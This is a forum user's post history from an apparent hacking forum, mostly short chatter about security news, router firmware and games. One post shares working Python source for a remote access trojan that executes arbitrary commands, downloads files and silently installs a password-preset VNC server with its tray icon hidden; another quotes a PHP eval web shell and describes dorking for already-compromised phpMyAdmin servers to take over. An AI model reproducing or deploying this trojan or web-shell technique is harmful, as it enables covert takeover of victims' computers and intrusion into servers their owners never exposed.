DingleBerries
-
Posts
1,291 -
Joined
-
Last visited
Posts posted by DingleBerries
-
-
There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run.
-
I wish hak5 had down vote buttons.
-
source code?
-
Here is a RAT i have been working on in python. Its not done. Download Terry the Trojan and use that as the client to send/recieve data.
from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: if sys.argv[1] == "/port": try: portvar = int(sys.argv[2]) except: portvar = 2727 except: portvar = 2727 def std(string): stdbox.config(state=NORMAL) stdbox.insert(END,"" + string + "\n") stdbox.config(state=DISABLED) def cnnect(var="poo"): sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) success = 1 try: sockt.connect((ipbox.get(),portvar)) except: success = 0 std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") if success == 1: sockt.send(cmdbox.get()) retdata = sockt.recv(2048) std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop()
HAH shit wrong code. Ill post it in a min.
OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.
import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: channel, details = sockt.accept() command = channel.recv(2048) if command == "kill": channel.send("Server trojan has been closed.") sys.exit() elif command == "ip": connect = s.connect(("www.whatismyipaddress.com", 80)) s.send('GET / HTTP/1.0\n\n') socketlines = s.recv(2048) lines = socketlines.split() ip = lines[len(lines) - 1] channel.send(ip) elif command == "whoami": channel.send(os.environ["USERNAME"]) elif command == "drive": channel.send(os.environ["HOMEDRIVE"]) elif command == "userfolder": channel.send(os.environ["HOMEPATH"]) elif command == "installvnc": urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') fs=os.popen3('update.exe /sp- /verysilent','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(1) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(0.2) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(0.5) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(0.3) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(1) fs=os.popen3('net start "VNC Server"','b') fs=os.popen3('del update.exe','b') channel.send("VNC was installed, password is vncserv.") elif command == "netstat": fs=os.popen3('netstat -ano>windsys.ini','b') sleep(2) f = open('windsys.ini') channel.send(f.read()) f.close() elif command == "whereami": channel.send(os.getcwd()) elif command.startswith("download "): file = command.replace("download ", "") urllib.urlretrieve(file,"file.exe") channel.send("File downloaded. Saved as 'file.exe', rename extension") else: csuc = 1 try: fs=os.popen3(command,'b') except: csuc = 0 if csuc == 1: channel.send("Command Sucessful") else: channel.send("Command Failed") channel.close()
-
To much processing power. You will need a big ass router.
-
Mine was 1<3m4|\|U3)
-
The pwnies being the pwned?
-
If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.
-
I don't know of a forum software that doesn't send out *temporary* passwords in plain text. PHPBB, Simple Machines Forum and Invision Power Board all share this behaviour. If your email isn't secure, we can't help you on that front, other than suggest you look at hushmail.
I havent played around with PHPbb, but I know other forums that send you a reset link. If anything I'd expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me.
Just saw you post Vako. Glad they were hashed. Good luck BFing the good ones.
-
Python can do that with ease. This code does it for google groups but can be easily modified to fit your needs.
-
Darren has the complied version of it on his site, link. I also have the AESkey find compiled if anyone needs that.
-
My favorite way is to use the "Welcome to phpMyAdmin" AND " Create new database" dork and find databases that have already been poped. Look for
<?php eval($_POST[cmd]);?>
And try to find the page where you send commands. That or root the box your self from there.
-
Why am I being email a plain text password when I try to recover my account? I know that I should change it but I am not sure if other are sure about what to do.
-
Nope, not saying that at all. Just saying that brute forcing it isn't going to get you everything you need. Gotta actually solve it.
http://twitter.com/hak5darren/status/1664879332
If you havent solved it dont try to help with it.
-
Episode 5x11
in Hak5
Most of the shit Matt says is a bit pointless anyways. Bashing his own users and a really use python script? He does know his servers and topography though.
Just like the elitist Linux users, the same crowd also exist in the MAC and Windows world. Use what works for you and shut up. If some one ask then inform them, give them a demo... if not let them do what they want.
-
Ditto
-
Fuck that. If I win I demand some of his hair.
-
why not scan the domain and see what ports are opened?
-
I am stuck on the lie atm
-
-
1st one is easy, but logging in is a bit harder.
-
Still wont stop boot hijack. Long live physical access!
-
whats this
in Gaming
ManwithWhiteFishForehead Kicking Game?>_> you sir, are a genius.
-
whats this
in Gaming
Hai guise. I used to play this game. There were these options and some characters and you fought bad guys. I cant remember anything else about it, only that it was a long time ago. Can I has halp?
Resetting Gargoyle root password
in Security
Posted
Why not try the httpd exploit for dd-wrt? I dont know if it will work but it is worth a try.